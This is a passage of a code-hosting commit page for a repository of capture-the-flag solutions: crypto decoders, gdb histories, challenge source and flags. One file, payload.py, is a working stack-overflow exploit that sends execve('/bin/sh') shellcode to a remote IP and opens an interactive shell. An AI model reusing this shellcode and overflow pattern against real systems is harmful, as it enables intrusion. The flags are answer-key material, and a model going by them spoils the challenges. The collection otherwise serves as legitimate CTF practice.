浏览代码

first commit

master
Christopher Yu 5 年前
当前提交
9601394f3e
共有 93 个文件被更改,包括 669 次插入0 次删除
  1. +12
    -0
      AsgamaCTF/Crypto/1byte_ROXy/decode.py
  2. +1
    -0
      AsgamaCTF/Crypto/Capek/base
  3. +10
    -0
      AsgamaCTF/Crypto/Capek/decryptloop.py
  4. 二进制
      AsgamaCTF/Reverse/XOR_in_reverse/Xrev
  5. +194
    -0
      AsgamaCTF/Reverse/pwd/.gdb_history
  6. +1
    -0
      AsgamaCTF/Reverse/pwd/decode.py
  7. 二进制
      AsgamaCTF/Reverse/pwd/pwdrev
  8. 二进制
      CJ2018/Pwn/Dionysus/dionysus_client
  9. 二进制
      CJ2018/Pwn/Dionysus/dionysus_server
  10. 二进制
      GKSK/Crypto/GKSK_Crypto_Service/GKSK_CRYPTO_SERVICE.zip
  11. +26
    -0
      GKSK/Crypto/GKSK_Crypto_Service/decrypt.py
  12. +1
    -0
      GKSK/Crypto/GKSK_Crypto_Service/flag.enc
  13. +97
    -0
      GKSK/Crypto/GKSK_Crypto_Service/gksk_crypto_service.py
  14. +1
    -0
      GKSK/Joy/Hack_The_Game_v0.0.1/flag.txt
  15. 二进制
      GKSK/Joy/Hack_The_Game_v0.0.1/version001
  16. +4
    -0
      GKSK/Joy/Hack_The_Game_v0.0.2/cheat.py
  17. +12
    -0
      GKSK/Joy/Hack_The_Game_v0.0.2/test.py
  18. 二进制
      GKSK/Joy/Hack_The_Game_v0.0.2/version002
  19. +3
    -0
      GKSK/Pwn/World_war/.gdb_history
  20. +15
    -0
      GKSK/Pwn/World_war/payload.py
  21. +1
    -0
      GKSK/Pwn/World_war/peda-session-world_war.txt
  22. 二进制
      GKSK/Pwn/World_war/world_war
  23. 二进制
      GKSK/Reverse/Decimal1.0/Decimal_1.0
  24. +35
    -0
      IDCC/Crypto/DecryptME/decrypt.py
  25. +1
    -0
      IDCC/Crypto/DecryptME/enkripsi
  26. +35
    -0
      IDCC/Crypto/DecryptME/test.py
  27. +29
    -0
      SlashRoot/Crypto/RSA_Token_Generator/payload.py
  28. 二进制
      TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_214809.png
  29. 二进制
      TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_222836.png
  30. 二进制
      TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_223153.png
  31. 二进制
      TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_224641.png
  32. 二进制
      TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_224730.png
  33. 二进制
      TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_225328.png
  34. 二进制
      TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_225608.png
  35. 二进制
      TAMUCTF/Crypto/Smile/Screenshot_20190302_231451.png
  36. 二进制
      TAMUCTF/Crypto/Smile/Screenshot_20190302_231606.png
  37. 二进制
      TAMUCTF/Crypto/Smile/Screenshot_20190302_232351.png
  38. 二进制
      TAMUCTF/Crypto/Smile/Screenshot_20190302_232540.png
  39. +13
    -0
      TAMUCTF/Crypto/Smile/decoder.py
  40. 二进制
      TAMUCTF/Misc/Hello_World/Screenshot_20190303_161722.png
  41. 二进制
      TAMUCTF/Misc/Hello_World/Screenshot_20190303_163026.png
  42. 二进制
      TAMUCTF/Misc/Hello_World/Screenshot_20190303_163249.png
  43. 二进制
      TAMUCTF/Misc/Hello_World/Screenshot_20190303_163350.png
  44. +99
    -0
      TAMUCTF/Misc/Hello_World/decoder.py
  45. 二进制
      TAMUCTF/Misc/I_heard_you_like_files/Screenshot_20190303_155553.png
  46. 二进制
      TAMUCTF/Misc/I_heard_you_like_files/Screenshot_20190303_160033.png
  47. 二进制
      TAMUCTF/Misc/I_heard_you_like_files/Screenshot_20190303_160404.png
  48. 二进制
      TAMUCTF/Misc/I_heard_you_like_files/Screenshot_20190303_160559.png
  49. 二进制
      TAMUCTF/Misc/I_heard_you_like_files/Screenshot_20190303_160905.png
  50. 二进制
      TAMUCTF/Misc/I_heard_you_like_files/art.png
  51. +27
    -0
      TAMUCTF/Misc/I_heard_you_like_files/output/audit.txt
  52. 二进制
      TAMUCTF/Misc/I_heard_you_like_files/output/pdf/00006657.pdf
  53. 二进制
      TAMUCTF/Misc/I_heard_you_like_files/output/png/00000000.png
  54. 二进制
      TAMUCTF/Misc/I_heard_you_like_files/output/zip/00006700.zip
  55. +3
    -0
      TAMUCTF/Misc/I_heard_you_like_files/output/zip/[Content_Types].xml
  56. +3
    -0
      TAMUCTF/Misc/I_heard_you_like_files/output/zip/_rels/.rels
  57. +2
    -0
      TAMUCTF/Misc/I_heard_you_like_files/output/zip/docProps/app.xml
  58. +2
    -0
      TAMUCTF/Misc/I_heard_you_like_files/output/zip/docProps/core.xml
  59. +1
    -0
      TAMUCTF/Misc/I_heard_you_like_files/output/zip/not_the_flag.txt
  60. +3
    -0
      TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/_rels/document.xml.rels
  61. +2
    -0
      TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/document.xml
  62. +2
    -0
      TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/fontTable.xml
  63. 二进制
      TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/media/image1.png
  64. +2
    -0
      TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/settings.xml
  65. +2
    -0
      TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/styles.xml
  66. +10
    -0
      TAMUCTF/Reverse/KeyGenMe/.gdb_history
  67. 二进制
      TAMUCTF/Reverse/KeyGenMe/Screenshot_20190302_233546.png
  68. 二进制
      TAMUCTF/Reverse/KeyGenMe/Screenshot_20190302_233856.png
  69. 二进制
      TAMUCTF/Reverse/KeyGenMe/Screenshot_20190302_234341.png
  70. 二进制
      TAMUCTF/Reverse/KeyGenMe/Screenshot_20190302_234432.png
  71. 二进制
      TAMUCTF/Reverse/KeyGenMe/Screenshot_20190302_235534.png
  72. 二进制
      TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_000342.png
  73. 二进制
      TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_000843.png
  74. 二进制
      TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_001206.png
  75. 二进制
      TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_001324.png
  76. 二进制
      TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_001417.png
  77. 二进制
      TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_001835.png
  78. 二进制
      TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_002033.png
  79. +20
    -0
      TAMUCTF/Reverse/KeyGenMe/bruteforce.py
  80. 二进制
      TAMUCTF/Reverse/KeyGenMe/keygenme
  81. 二进制
      TAMUCTF/Secure_Coding/SQL/Screenshot_20190303_153550.png
  82. 二进制
      TAMUCTF/Secure_Coding/SQL/Screenshot_20190303_153910.png
  83. 二进制
      TAMUCTF/Secure_Coding/SQL/Screenshot_20190303_154148.png
  84. 二进制
      TAMUCTF/Web/Many_Gigems_To_You/Screenshot_20190302_202844.png
  85. 二进制
      TAMUCTF/Web/Many_Gigems_To_You/Screenshot_20190302_203307.png
  86. 二进制
      TAMUCTF/Web/Many_Gigems_To_You/Screenshot_20190302_203644.png
  87. 二进制
      TAMUCTF/Web/Many_Gigems_To_You/Screenshot_20190302_203910.png
  88. 二进制
      TAMUCTF/Web/Not_Another_SQLi_Challenge/Screenshot_20190302_200611.png
  89. 二进制
      TAMUCTF/Web/Not_Another_SQLi_Challenge/Screenshot_20190302_200703.png
  90. 二进制
      TAMUCTF/Web/Not_Another_SQLi_Challenge/Screenshot_20190302_200832.png
  91. 二进制
      TAMUCTF/Web/Robots_Rule/Screenshot_20190302_201534.png
  92. 二进制
      TAMUCTF/Web/Robots_Rule/Screenshot_20190302_201719.png
  93. 二进制
      TAMUCTF/Web/Robots_Rule/Screenshot_20190302_202358.png

+ 12
- 0
AsgamaCTF/Crypto/1byte_ROXy/decode.py 查看文件

@ -0,0 +1,12 @@
from pwn import *
cipher = "e7c1cdc1e3f4e6dbcfcec5ffc2d9d4c5ffd8cfd2d29f9fdd"
cipher = cipher.decode('hex')
for i in range(256):
plain = xor(cipher, i)
if "GamaCTF{" in plain:
print plain
break

+ 1
- 0
AsgamaCTF/Crypto/Capek/base 查看文件

@ -0,0 +1 @@
Vm0wd2QyUXlVWGxWV0d4V1YwZDRWMVl3WkRSV01WbDNXa1JTVjAxV2JETlhhMUpUVjBaS2RHVkdXbFppVkZaeVZtMTRTMk15VGtsalJtaG9UV3N3ZUZadGNFZFRNazE1VTJ0V1ZXSkhhRzlVVmxaM1ZsWmFkR05GU214U2JHdzFWVEowVjFaWFNraGhSemxWVmpOT00xcFZXbUZrUjA1R1pFWlNUbFpYZHpGV1ZFb3dWakZhV0ZOcmFHaFNlbXhXVm1wT1QwMHhjRlpYYlVaclVqQTFSMWRyV25kV01ERkZVbFJHVjFaRmIzZFdha1poVjBaT2NtRkhhRk5sYlhoWFZtMHhORmxWTUhoWGJrNVlZbFZhY2xWcVFURlNNVlY1VFZSU1ZrMXJjRmhWTW5SM1ZqSktWVkpZWkZwV1JWcHlWVEJhVDJOc2NFaGpSazVYVWpOb2IxWXhaRFJWTVVsNVZXNU9XR0pIVWxsWmJHaFRWMFpTVjJGRlRsTmlSbkJaV2xWYVQxWlhTbFpYVkVwV1lrWktSRlpxUVhoa1ZsWjFWMnhhYUdFeGNGbFhhMVpoVkRKTmVGcElUbWhTTW5oVVZGY3hiMWRzV1hoWGJYUk9VakZHTlZaWE5VOWhiRXAwVld4c1dtSkdXbWhaTW5oWFkxWkdWVkpzVGs1WFJVcElWbXBLTkZReFdsaFRhMlJxVW14d1dGbHNhRk5OTVZweFUydDBWMVpyY0ZwWGExcDNZa2RGZWxGcmJGZGlXRUpJVmtSS1UxWXhXblZVYkdocFZqSm9lbGRYZUc5aU1rbDRWMjVTVGxkSFVsWlVWbHBYVGxaV2RHUkhkRmROVjFKSldWVmFjMWR0U2tkWGJXaGFUVzVvV0ZreFdrZFdWa3B6VkdzMVYwMVZiekZXYlhCTFRrWlJlRmRzYUZSaVJuQnhWV3hrVTFsV1VsWlhiVVpPVFZad2VGVXlkREJXTVZweVkwWndXR0V4Y0hKWlZXUkdaVWRPUjJKR2FHaE5WbkJ2Vm10U1MxUXlUWGxVYTFwaFVqSm9WRlJYTlc5a2JGcEhWbTA1VWsxWFVsaFdNV2h2V1ZaS1IxTnNaRlZXYkhCNlZHdGFWbVZYVWtoa1JtaFRUVWhDU2xac1pEUmpNV1IwVTJ0b2FGSnNTbGhVVlZwM1ZrWmFjVk5yWkZOaVJrcDZWa2N4YzFVeVNuSlRiVVpYVFc1b1dGbHFTa1psUm1SWldrVTFWMVpzY0ZWWFYzUnJWVEZzVjFWc1dsaGlWVnB6V1d0YWQyVkdWWGxrUkVKWFRWWndlVll5ZUhkWGJGcFhZMGhLVjFaRldreFdNVnBIWTIxS1IxcEdaRTVOUlhCS1ZtMTBVMU14VlhoWFdHaGhVMFphVmxscldrdGpSbHB4VkcwNVYxWnNjRWhYVkU1dllWVXhXRlZ1Y0ZkTlYyaDJWMVphUzFJeFRuVlJiRlpYVFRGS05sWkdVa2RWTVZwMFVtdG9VRlp0YUZSVVZXaERVMnhhYzFwRVVtcE5WMUl3VlRKMGIyRkdTbk5UYkdoVlZsWndNMVpyV21GalZrcDFXa1pPVGxacmNEVldSM2hoVkRKR1YxTnVVbEJXUlRWWVZGYzFiMWRHWkZkWGJFcHNWbXR3ZVZkcldtOWhWMFkyVm01b1YxWkZTbkpVYTFwclVqRldjMXBHYUdoTk1VcFZWbGN4TkdReVZrZFdXR3hyVWpOU2IxbHNWbmRXTVZwMFkwZEdXR0pHY0ZoWk1HUnZWMnhhV0ZWclpHRldWMUpRVlRCVk5WWXlSa2hoUlRWWFltdEtNbFp0TVRCVk1VMTRWVmhzVlZkSGVGWlpWRVozWVVaV2NWTnRPVmRTYkVwWlZGWmpOV0pIU2toVmJHeGhWbGROTVZsV1ZYaFhSbFoxWTBaa1RsWXlhREpXYWtKclV6RmtWMVp1U2xCV2JIQndWakJhUzA1c1drZFZhMlJXVFdzeE5GWXlOVk5oTVVwMFZXNUNWMkpIYUVSVWJGcHJWbFpHZEZKdGNFNVdNVWwzVmxSS01HRXhaRWhUYkdob1VqQmFWbFp0ZUhkTk1XeFdWMjVrVTJKSVFrZFVNVlUxWVZaS1dWRllaRmhpUmxwb1ZrUktSMVl4VW5KWGJGSnBWbFp3V1ZaR1l6RmlNV1JIWWtoR1ZHRXhjSE5WYlRGVFYyeGtjbFpVUmxkTmEzQllWVEkxYjFZeFdYcGhTRXBhWVd0YWNsVnFSbGRqTWtaR1QxWmtWMVpHV2pKV2JHTjRUa2RSZVZaclpGZFhSM2h5VldwT1UySXhiSE5XYm1SWFRWZDRNVmt3VmpCV01rcEhZa1JhV2xaWGFFeFdNbmhoVjBaV2NscEhSbGRXTVVwUlZsUkNhMUl4U1hsU2EyaHBVbXMxY0ZVd1ZrdE5iRnB4VW0xR1ZrMVZNVFJXVm1oelZsWmtTR0ZIYUZaTlJuQm9WbTE0YzJOc1pISmtSM0JUWWtad05GWlhNVEJOUmxsNFYyNU9hbEpYYUZoV2FrNVRWRVpzVlZGWWFGTldhM0I2VmtkNFlWVXlTa1pYV0hCWFZsWndSMVF4V2tOVmJFSlZUVVF3UFE9PQ==

+ 10
- 0
AsgamaCTF/Crypto/Capek/decryptloop.py 查看文件

@ -0,0 +1,10 @@
from base64 import *
with open("base", "r") as file:
text = file.read()
decoded = ""
while True:
decoded = b64decode(text)
text = decoded
if(text.find("CTF{") != -1):
break
print text

二进制
AsgamaCTF/Reverse/XOR_in_reverse/Xrev 查看文件


+ 194
- 0
AsgamaCTF/Reverse/pwd/.gdb_history 查看文件

@ -0,0 +1,194 @@
b *main
r
ni
r
ni
si
ni
si
ni
pdisas c
b *0x0000000000400761
r
ni
si
ni
r
ni
si
ni
ni
r
r
r < $(python -c "print '\xde\x00\x00\x00'")
r <<< $(python -c "print '\xde\x00\x00\x00'")
ni
r <<< $(python -c "print '\xde\x00\x00\x00'")
ni
r <<< $(python -c "print '\xbe\x00\x00\x00'")
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde'")
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde'")
ni
si
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x1d\x00\x00\x00\x00'")
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde'")
ni
si
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde\x00\x02'")
ni
si
ni
r <<< $(python -c "print '\x20\x00\xef\xee\xbe\xad\xde'")
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde'")
ni
r <<< $(python -c "print '\x02\x00\xef\xee\xbe\xad\xde'")
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde'")
ni
si
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x1d\x00\x00\x00\x00'")
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x1d\x00\x00\x00\'")
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00\x00\x00\x1d'")
ni
si
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\xef\xee\xbe\x1d'")
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\x1d'")
ni
pdisas c
b *0x0000000000400746
r <<< $(python -c "print '\xef\xee\xbe\xad\x22'")
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde'")
ni
si
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde\x11\x11\x11\x11\x1d'")
ni
r <<< $(python -c "print '\x11\x11\x11\x11\x1d\xef\xee\xbe\xad\xde'")
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + 'a' * 4 + '\x1d'")
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde'")
ni
si
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + a * 8")
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + a")
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde'")
ni
r <<< $(python -c "print 'a' + '\xef\xee\xbe\xad\xde'")
ni
r <<< $(python -c "print 'a' * 8 + '\xef\xee\xbe\xad\xde'")
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde'")
ni
si
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x1d\x1d\x1d\x1d'")
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\xde\x1d\x1d\x1d'")
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x1d\x1d\x1d'")
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00\x00\x00x1d'")
ni
si
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00\x00\x00\x1d'")
ni
si
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' * 7 + '\x1d'")
ni
si
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' * 6 + '\x1d'")
ni
si
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + 'a' * 7 + '\x1d'")
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + 'a' * 7 + '\x1d'")
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' * 7 + '\x1d'")
ni
si
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x1d' + 'a' * 7")
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x1d' + '\x00' * 7")
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' + '\x1d' + '\x00' * 6")
ni
si
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' + '\x1d' + '\xd0' * 6")
ni
si
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x1d' + '\x00' * 7")
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' * 3 + '\x00' * 4 + '\x1d'")
ni
si
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' * 7 + '\x1d'")
ni
si
ni
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' * 7 + 'a'")
ni
si
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' * 7 + 'a'")
ni
si
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' * 7 + 'a'")
ni
si
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' * 7 + 'a'* 7")
ni
si
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' + 'a'* 20")
ni
si
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' + 'a'* 40")
ni
si
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00'*7 + '\x1e'")
ni
si
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' + '\x1e' * 7")
ni
si
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' + '\x1e' * 14")
ni
si
ni
r <<< $(python -c "print '\x00' + '\xef\xee\xbe\xad\xde' + '\x00' + '\x1e' * 14")
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' + '\x1e' * 13")
ni
si
ni
r <<< $(python -c "print '\xde' + '\x00' + '\x1e' * 13")
ni
r <<< $(python -c "print '\xef\xee\xbe\xad\xde' + '\x00' + '\x1e' * 13")

+ 1
- 0
AsgamaCTF/Reverse/pwd/decode.py 查看文件

@ -0,0 +1 @@

二进制
AsgamaCTF/Reverse/pwd/pwdrev 查看文件


二进制
CJ2018/Pwn/Dionysus/dionysus_client 查看文件


二进制
CJ2018/Pwn/Dionysus/dionysus_server 查看文件


二进制
GKSK/Crypto/GKSK_Crypto_Service/GKSK_CRYPTO_SERVICE.zip 查看文件


+ 26
- 0
GKSK/Crypto/GKSK_Crypto_Service/decrypt.py 查看文件

@ -0,0 +1,26 @@
import base64
secret_out = ''
secret_str = ''.join("gksk-secret-code".split("-"))
for count, loop in enumerate(secret_str):
if count % 2 == 0:
secret_out += ''.join([chr(ord(ch) + 0x3) for ch in loop])
else:
secret_out += loop
print secret_out
enc = open("flag.enc", "r").read()
shift_key = 0
while True:
shift_key += 1
cipher = base64.b64decode(enc)
alphabet = secret_out * 50
shifted_alphabet = alphabet[shift_key:] + alphabet[:shift_key]
flag = ''
for i in range(len(cipher[:-1])):
flag += chr((ord(cipher[i]) ^ shift_key) - ord(shifted_alphabet[i]))
if "GKSK{" in flag:
print flag
break

+ 1
- 0
GKSK/Crypto/GKSK_Crypto_Service/flag.enc 查看文件

@ -0,0 +1 @@
kraiqvy1qe+2oqi2kbSftqS3/KmknKHv7+/rwbj/pK+h8+XS8p+topm17b72sK2b8q6go/ygmaijtfaxoZipm67vv6un8Zu2r7ag4fLHqZGz9Jzxkbet/qG2t5Gpk/ywmLWg/8/LwcyftKmuqbycqZC1rKqzsLWdtqys79ujqqGprLDjoaacor2qqqqgvJHuo7Co0OebveWToojt9s6otrWQqe+psq6h7baa/qG2t5Gpk//+BQ==

+ 97
- 0
GKSK/Crypto/GKSK_Crypto_Service/gksk_crypto_service.py 查看文件

@ -0,0 +1,97 @@
#!/usr/bin/python2.7
# -*- coding: utf-8 -*-
import sys
import random
import base64
def banner():
return '''
Welcome to our brand new crypto service
________ _______ __ __ ____________ ______ __________ _____ __________ _ __________________
/ ____/ //_/ ___// //_/ / ____/ __ \ \/ / __ \/_ __/ __ \ / ___// ____/ __ \ | / / _/ ____/ ____/
/ / __/ ,< \__ \/ ,< / / / /_/ /\ / /_/ / / / / / / / \__ \/ __/ / /_/ / | / // // / / __/
/ /_/ / /| |___/ / /| | / /___/ _, _/ / / ____/ / / / /_/ / ___/ / /___/ _, _/| |/ // // /___/ /___
\____/_/ |_/____/_/ |_| \____/_/ |_| /_/_/ /_/ \____/ /____/_____/_/ |_| |___/___/\____/_____/
version [v2.1.19]
'''
def print_usage(script_argv):
print '[==USAGE==]\n'
print 'Encrypt File \t: %s -e [plaintext_file] [key]' % script_argv
print 'Decrypt File \t: %s -d [encrypted_file] [key]' % script_argv
print 'Generate Key \t: %s -g' % script_argv
print 'Help \t\t: %s -h\n' % script_argv
def shift_key():
key = random.randint(0x1, 0xff)
return key
def shuffle_secret():
secret_out = ''
secret_str = ''.join('gksk-secret-code'.split('-'))
for count,loop in enumerate(secret_str):
if count % 2 == 0:
secret_out += ''.join([chr(ord(ch) + 0x3) for ch in loop])
else:
secret_out += loop
return secret_out
def encryption(plain, shift):
try:
ciphertext = ''
length_msg = 50
with open(plain, 'rb') as bin:
data = bin.read()
shift = int(shift)
alphabet = shuffle_secret() * length_msg
shifted_alphabet = alphabet[shift:] + alphabet[:shift]
for a, b in zip(data, shifted_alphabet):
ciphertext += chr(ord(a) + ord(b) ^ shift)
with open(plain + '.enc', 'wb') as bin:
bin.write(base64.b64encode(ciphertext))
except ValueError:
print "ValueError : Range key [0-255]"
exit()
def decryption(enc_file, key):
with open(enc_file, 'rb') as bin:
data = bin.read()
'''NOT IMPLEMENTED YET'''
with open(enc_file + '.trial', 'wb') as bin:
bin.write(data)
def main():
print banner()
script_argv = sys.argv[0]
try:
mode = sys.argv[1]
if mode == '-e':
plaintext_file = sys.argv[2]
key = sys.argv[3]
encryption(plaintext_file, key)
print "\nSECRET KEY : ", shuffle_secret()
print '\nThankyou for using our service :)\n'
elif mode == '-d':
encrypted_file = sys.argv[2]
key = sys.argv[3]
decryption(encrypted_file, key)
print '\nNot implemented yet. Upgrade to premium, only $99999\n'
elif mode == '-g':
print 'Key : ', shift_key()
elif mode == '-h':
print_usage(script_argv)
else:
print_usage(script_argv)
except IndexError:
print_usage(script_argv)
if __name__ == '__main__':
main()

+ 1
- 0
GKSK/Joy/Hack_The_Game_v0.0.1/flag.txt 查看文件

@ -0,0 +1 @@
GKSK{4re_Y0u_53ri0usly_checking_f0r_b3t4_t3sT?}

二进制
GKSK/Joy/Hack_The_Game_v0.0.1/version001 查看文件


+ 4
- 0
GKSK/Joy/Hack_The_Game_v0.0.2/cheat.py 查看文件

@ -0,0 +1,4 @@
import base64
cheat = "PlayerLevel=1;PlayerExp=1;PlayerHP=100;PlayerAtk=987654321;PlayerDef=987654321;PlayerName=ar"
print base64.b64encode(cheat)

+ 12
- 0
GKSK/Joy/Hack_The_Game_v0.0.2/test.py 查看文件

@ -0,0 +1,12 @@
cheat = "UGxheWVyTGV2ZWw9OTk5OTk5OTk5O1BsYXllckV4cD05OTk5OTk5OTk5O1BsYXllckhQPTk4NzY1NDMyMTtQbGF5ZXJBdGs9OTg3NjU0MzIxO1BsYXllckRlZj05ODc2NTQzMjE7UGxheWVyTmFtZT1Cb2Rv"
alphabet = "abcdefghijklmnopqrstuvwxyz"
newcheat = ""
for i in cheat:
if i in alphabet.upper():
newcheat += i.lower()
elif i in alphabet.lower():
newcheat += i.upper()
else:
newcheat += i
print newcheat

二进制
GKSK/Joy/Hack_The_Game_v0.0.2/version002 查看文件


+ 3
- 0
GKSK/Pwn/World_war/.gdb_history 查看文件

@ -0,0 +1,3 @@
pattern create 500
r
pattern offset 0x65414149

+ 15
- 0
GKSK/Pwn/World_war/payload.py 查看文件

@ -0,0 +1,15 @@
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
from pwn import *
r = remote("180.250.7.183", 51137)
r.recvuntil("coordinate : ")
buff = r.recvline()
buff = buff[:10]
buff = int(buff, 16)
buff = p32(buff)
payload = shellcode + "a" * (72-len(shellcode)) + buff
r.sendline(payload)
r.interactive()

+ 1
- 0
GKSK/Pwn/World_war/peda-session-world_war.txt 查看文件

@ -0,0 +1 @@

二进制
GKSK/Pwn/World_war/world_war 查看文件


二进制
GKSK/Reverse/Decimal1.0/Decimal_1.0 查看文件


+ 35
- 0
IDCC/Crypto/DecryptME/decrypt.py 查看文件

@ -0,0 +1,35 @@
# Python2 ver.
# If you use Python3 interpreter, the trouble will be in print format
# [KSL Playground][Crypto][IDCC2018 DecryptME] written by Mr. Goodnight
# Link: https://euectf.stikom-bali.ac.id/challenges#[IDCC]%20DecryptME
# Flag: IDCC{S1mpl3_4nd_stR4ight}
from base64 import *
# Encryption algorithm
# ciphertext = plaintext + keys
with open('./enkripsi', mode = 'r') as f:
ciphertext = f.read()
# plaintext = ciphertext - keys
# Make my own function to decrypt the ciphertext
def decrypt(ciphertext, keys):
plaintext = ""
for num,char in enumerate (ciphertext):
plaintext += chr((ord(char) - ord(keys[num % len(keys)])) % 127)
return plaintext
# keys = ciphertext - plaitext
# Find the key by using known string attack
# Then I found out that the key is raja
known_string = b64encode("IDCC{")
keys = ""
for num,char in enumerate (known_string):
keys += chr((ord(ciphertext[num]) - ord(char)) % 127)
# Run the decrypt function the decode it
keys = "raja"
flag = b64decode(decrypt(ciphertext, keys))
print ("Flag: {f}".format(f = flag))

+ 1
- 0
IDCC/Crypto/DecryptME/enkripsi 查看文件

@ -0,0 +1 @@
F7=&D_6@9YU&9HA) MK9HL=RMSY3(

+ 35
- 0
IDCC/Crypto/DecryptME/test.py 查看文件

@ -0,0 +1,35 @@
from base64 import *
def enkripsi(plain, keys):
enc = []
plain = b64encode(plain)
for i, l in enumerate(plain):
kunci = ord(keys[i % len(keys)])
teks = ord(l)
enc.append(chr((teks + kunci) % 127))
#enc = teks + kunci
return ''.join(enc)
def findKey():
key = []
known = b64encode("IDCC{")
file = open("enkripsi", "rb")
file = file.read()
for i, l in enumerate(known):
kunci = ord(file[i])
teks = ord(l)
key.append((chr((kunci - teks) % 127)))
return ''.join(key)
def decryption():
key = "raja"
flag = []
file = open("enkripsi", "r").read()
for i, l in enumerate(file):
kunci = ord(key[i % len(key)])
cipher = ord(l)
flag.append(chr((cipher - kunci) % 127))
return ''.join(flag)
print findKey()
print b64decode(decryption())

+ 29
- 0
SlashRoot/Crypto/RSA_Token_Generator/payload.py 查看文件

@ -0,0 +1,29 @@
from pwn import *
r = remote("103.200.7.156", 1003)
r.recvuntil(">>> ")
r.sendline("2")
for i in range(5):
r.recvuntil("e = ")
e = r.recvline()
e = int(e[:-1])
r.recvuntil("n = ")
n = r.recvline()
n = int(n[:-1])
r.recvuntil("c = ")
c = r.recvline()
c = int(c[:-1])
p = 1000
while True:
if(pow(p, e, n) == c):
break
p +=1
r.sendline(str(p))
print "p = ", p
r.interactive()

二进制
TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_214809.png 查看文件

之前 之后
宽度: 1032  |  高度: 610  |  大小: 81 KiB

二进制
TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_222836.png 查看文件

之前 之后
宽度: 879  |  高度: 57  |  大小: 12 KiB

二进制
TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_223153.png 查看文件

之前 之后
宽度: 1153  |  高度: 150  |  大小: 10 KiB

二进制
TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_224641.png 查看文件

之前 之后
宽度: 1032  |  高度: 610  |  大小: 71 KiB

二进制
TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_224730.png 查看文件

之前 之后
宽度: 890  |  高度: 82  |  大小: 27 KiB

二进制
TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_225328.png 查看文件

之前 之后
宽度: 1032  |  高度: 610  |  大小: 82 KiB

二进制
TAMUCTF/Crypto/RSAaaay/Screenshot_20190302_225608.png 查看文件

之前 之后
